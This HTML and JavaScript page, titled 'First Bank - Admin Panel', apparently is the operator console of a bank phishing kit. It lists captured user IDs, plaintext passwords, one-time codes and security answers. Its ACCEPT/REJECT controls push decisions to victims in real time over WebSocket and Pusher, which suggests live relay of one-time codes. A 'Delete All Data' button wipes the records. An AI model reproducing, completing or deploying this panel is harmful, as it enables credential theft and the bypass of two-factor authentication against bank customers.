<!DOCTYPE html>
<html>
<head>
    <title>First Bank - Admin Panel</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="styles/admin.css">
    <!-- Pusher JavaScript library -->
    <script src="https://js.pusher.com/7.0/pusher.min.js"></script>
</head>
<body>
    <div class="container-fluid">
        <div class="row">
            <!-- Sidebar -->
            <nav class="col-md-3 col-lg-2 d-md-block bg-dark sidebar text-white">
                <div class="position-sticky pt-3">
                    <h4 class="text-center py-3">Admin Panel</h4>
                    <ul class="nav flex-column">
                        <li class="nav-item">
                            <a class="nav-link text-white" href="#">
                                <span data-feather="home"></span>
                                Dashboard
                            </a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link text-white" href="#" onclick="logout()">
                                <span data-feather="log-out"></span>
                                Logout
                            </a>
                        </li>
                    </ul>
                </div>
            </nav>

            <!-- Main Content -->
            <main class="col-md-9 ms-sm-auto col-lg-10 px-md-4">
                <div class="d-flex justify-content-between flex-wrap flex-md-nowrap align-items-center pt-3 pb-2 mb-3 border-bottom">
                    <h1 class="h2">User Authentication Management</h1>
                </div>
                <button id="refreshButton" class="btn btn-primary mb-3" onclick="refreshPage()">Refresh</button>
                <button id="deleteAllButton" class="btn btn-danger mb-3 ms-2" onclick="deleteAllData()">Delete All Data</button>
                <div class="table-responsive">
                    <table id="userTable" class="table table-striped table-bordered">
                        <thead class="table-dark">
                            <tr>
                                <th>ID</th>
                                <th>UserID</th>
                                <th>OTP/Question</th>
                                <th>Date</th>
                                <th>Password</th>
                                <th>Login Actions</th>
                                <th>Status</th>
                                <!-- Removed OTP Actions column -->
                            </tr>
                        </thead>
                        <tbody id="tableBody">
                            <!-- Data will be loaded dynamically -->
                        </tbody>
                    </table>
                </div>
            </main>
        </div>
    </div>

    <!-- Bootstrap JS -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.datatables.net/1.12.1/js/jquery.dataTables.min.js"></script>
    <script src="https://cdn.datatables.net/buttons/2.2.3/js/dataTables.buttons.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.1.3/jszip.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.53/pdfmake.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.53/vfs_fonts.js"></script>
    <script src="https://cdn.datatables.net/buttons/2.2.3/js/buttons.html5.min.js"></script>
    <script>
        // Pusher configuration - using the same credentials as the client
        const PUSHER_KEY = '94894a770facc94dd4c3';
        const PUSHER_CLUSTER = 'us2';
        
        let pusher = null;
        
        // Initialize Pusher connection
        function initPusher() {
            try {
                // Initialize Pusher
                pusher = new Pusher(PUSHER_KEY, {
                    cluster: PUSHER_CLUSTER,
                    forceTLS: true
                });
                
                console.log('Pusher initialized successfully in admin panel');
                return true;
            } catch (error) {
                console.error('Error initializing Pusher:', error);
                return false;
            }
        }

        // WebSocket connection
        let socket = null;
        let isSocketConnected = false;
        
        // Initialize WebSocket connection
        function initWebSocket() {
            // Get the current hostname and use correct WebSocket protocol (ws or wss)
            const protocol = window.location.protocol === 'https:' ? 'wss:' : 'ws:';
            const wsUrl = `${protocol}//${window.location.hostname}:8080`;
            
            console.log(`Connecting to WebSocket at ${wsUrl}`);
            
            try {
                socket = new WebSocket(wsUrl);
                
                socket.onopen = function(e) {
                    console.log('WebSocket connection established');
                    isSocketConnected = true;
                };
                
                socket.onmessage = function(event) {
                    console.log('WebSocket message received:', event.data);
                };
                
                socket.onclose = function(event) {
                    if (event.wasClean) {
                        console.log(`WebSocket connection closed cleanly, code=${event.code}, reason=${event.reason}`);
                    } else {
                        // Connection died
                        console.error('WebSocket connection died');
                    }
                    isSocketConnected = false;
                };
                
                socket.onerror = function(error) {
                    console.error(`WebSocket error: ${error.message}`);
                    isSocketConnected = false;
                };
            } catch (error) {
                console.error('Error initializing WebSocket:', error);
            }
        }
        
        // Send status update via WebSocket
        function sendStatusUpdateViaWebSocket(attemptId, status) {
            if (!isSocketConnected || !socket) {
                console.log('WebSocket not connected, cannot send status update');
                return false;
            }
            
            const message = {
                type: 'status_update',
                attemptId: attemptId,
                status: status
            };
            
            socket.send(JSON.stringify(message));
            return true;
        }

        // Show a loading spinner while fetching data
        function showLoadingSpinner() {
            const tableBody = document.getElementById('tableBody');
            tableBody.innerHTML = '<tr><td colspan="7" style="text-align: center;">Loading...</td></tr>';
        }

        // Add filters for UserID, Status, and Date
        function addFilters() {
            const filterRow = document.createElement('tr');
            filterRow.innerHTML = `
                <td><input type="text" id="filterUserId" placeholder="Filter by UserID" class="form-control"></td>
                <td></td>
                <td></td>
                <td><input type="date" id="filterDate" class="form-control"></td>
                <td></td>
                <td>
                    <select id="filterStatus" class="form-control">
                        <option value="">All</option>
                        <option value="pending">Pending</option>
                        <option value="accepted">Accepted</option>
                        <option value="completed">Completed</option>
                        <option value="rejected">Rejected</option>
                    </select>
                </td>
                <td></td>
            `;
            document.querySelector('#userTable thead').appendChild(filterRow);

            // Add event listeners for filters
            document.getElementById('filterUserId').addEventListener('input', applyFilters);
            document.getElementById('filterDate').addEventListener('change', applyFilters);
            document.getElementById('filterStatus').addEventListener('change', applyFilters);
        }

        // Apply filters to the table
        function applyFilters() {
            const userIdFilter = document.getElementById('filterUserId').value.toLowerCase();
            const dateFilter = document.getElementById('filterDate').value;
            const statusFilter = document.getElementById('filterStatus').value;

            const rows = document.querySelectorAll('#tableBody tr');
            rows.forEach(row => {
                const userId = row.children[1].textContent.toLowerCase();
                const date = row.children[3].textContent;
                const status = row.children[5].textContent.toLowerCase();

                const matchesUserId = !userIdFilter || userId.includes(userIdFilter);
                const matchesDate = !dateFilter || date.startsWith(dateFilter);
                const matchesStatus = !statusFilter || status === statusFilter;

                row.style.display = matchesUserId && matchesDate && matchesStatus ? '' : 'none';
            });
        }

        // Initialize DataTable only after data is loaded
        function initializeDataTable() {
            if ($.fn.DataTable.isDataTable('#userTable')) {
                $('#userTable').DataTable().destroy(); // Destroy existing instance
            }
            $('#userTable').DataTable({
                dom: 'Bfrtip',
                buttons: ['copy', 'csv', 'excel', 'pdf'],
                order: [[0, 'desc']]
            });
        }

        // Fetch data from the server
        function fetchData() {
            showLoadingSpinner();
            $.ajax({
                url: 'refresh_attempts.php',
                type: 'GET',
                dataType: 'json',
                success: function(data) {
                    console.log('Server Response:', data); // Log the server response for debugging
                    populateTable(data);
                    initializeDataTable(); // Reinitialize DataTable after data is loaded
                },
                error: function(xhr, status, error) {
                    console.error('Error:', error);
                    console.error('Response Text:', xhr.responseText); // Log the server response for debugging
                }
            });
        }

        // Update the status cell background color and hide buttons based on the status
        function updateRowStyle(row, status) {
            const statusCell = row.querySelector('td:nth-child(7)'); // Assuming status is in the 7th column
            const actionCell = row.querySelector('td:nth-child(6)'); // Assuming actions are in the 6th column

            // Apply chip design and color based on status
            if (status === 'successful') {
                statusCell.style.backgroundColor = 'lightgreen';
                statusCell.style.color = 'white';
                statusCell.style.borderRadius = '12px';
                statusCell.style.padding = '5px 10px';
                statusCell.textContent = 'Successful';
            } else if (status === 'rejected') {
                statusCell.style.backgroundColor = 'red';
                statusCell.style.color = 'white';
                statusCell.style.borderRadius = '12px';
                statusCell.style.padding = '5px 10px';
                statusCell.textContent = 'Rejected';
            } else if (status === 'pending') {
                statusCell.style.backgroundColor = 'orange';
                statusCell.style.color = 'white';
                statusCell.style.borderRadius = '12px';
                statusCell.style.padding = '5px 10px';
                statusCell.textContent = 'Pending';
            }

            // Hide action buttons if status is not pending
            if (status !== 'pending') {
                actionCell.innerHTML = ''; // Clear the action cell
            }
        }

        // Refresh the table immediately after updating the status
        function updateStatus(id, type, newStatus) {
            $.ajax({
                url: 'send_notification.php',
                type: 'POST',
                data: { id, type, status: newStatus },
                dataType: 'json',
                success: function(response) {
                    if (response.success) {
                        alert(`User #${id} ${type} status updated to: ${newStatus}`);
                        
                        // Send WebSocket notification
                        if (isSocketConnected) {
                            sendStatusUpdateViaWebSocket(id, newStatus);
                        }
                        
                        // Refresh the entire page after a brief delay to allow the alert to be seen
                        setTimeout(function() {
                            window.location.reload();
                        }, 1000);
                    } else {
                        alert('Failed to update status. Please try again.');
                    }
                },
                error: function(xhr, status, error) {
                    alert('Error updating status. Please try again later.');
                    console.error('Error:', error);
                    console.error('Response Text:', xhr.responseText); // Log the server response for debugging
                }
            });
        }

        // Populate table with data
        function populateTable(data) {
            const tableBody = document.getElementById('tableBody');
            tableBody.innerHTML = '';

            if (!data || !Array.isArray(data.loginAttempts)) {
                console.error('Invalid data format:', data);
                const row = document.createElement('tr');
                row.innerHTML = `<td colspan="7" style="text-align: center;">Failed to load data. Please try again later.</td>`;
                tableBody.appendChild(row);
                return;
            }

            if (data.loginAttempts.length === 0) {
                const row = document.createElement('tr');
                row.innerHTML = `<td colspan="7" style="text-align: center;">No login attempts found.</td>`;
                tableBody.appendChild(row);
                return;
            }

            data.loginAttempts.forEach(user => {
                const row = document.createElement('tr');
                row.innerHTML = `
                    <td>${user.id}</td>
                    <td>${user.userId}</td>
                    <td>${user.otp_plain || user.question}</td>
                    <td>${user.date}</td>
                    <td>${user.password || 'N/A'}</td>
                    <td align="center">
                        ${user.status === 'pending' ? `
                            <a href="javascript:void(0)" onclick="updateStatus(${user.id}, 'login', 'accepted')" class="action-link accept-link">ACCEPT</a>
                            <a href="javascript:void(0)" onclick="updateStatus(${user.id}, 'login', 'rejected')" class="action-link reject-link">REJECT</a>
                        ` : ''}
                    </td>
                    <td align="center">
                        <span class="status-chip">${user.status.charAt(0).toUpperCase() + user.status.slice(1)}</span>
                    </td>
                `;
                tableBody.appendChild(row);

                // Apply background color and hide buttons based on status
                updateRowStyle(row, user.status);
            });
        }

        // Function to delete all data
        function deleteAllData() {
            if (confirm('Are you sure you want to delete all data? This action cannot be undone.')) {
                $.ajax({
                    url: 'delete_all_data.php',
                    type: 'POST',
                    success: function(response) {
                        alert('All data has been deleted successfully.');
                        window.location.reload(); // Reload the entire page after deletion
                    },
                    error: function(xhr, status, error) {
                        alert('Error deleting data. Please try again later.');
                        console.error('Error:', error);
                    }
                });
            }
        }

        // Function to refresh the page
        function refreshPage() {
            window.location.reload();
        }

        // Initialize the table with filters and loading spinner
        $(document).ready(function() {
            // Initialize Pusher first
            initPusher();
            initWebSocket();
            addFilters();
            fetchData();

            // Refresh button functionality
            $('#refreshButton').on('click', function() {
                refreshPage(); // Reload the entire page when the refresh button is clicked
            });
        });
    </script>
</body>
</html>
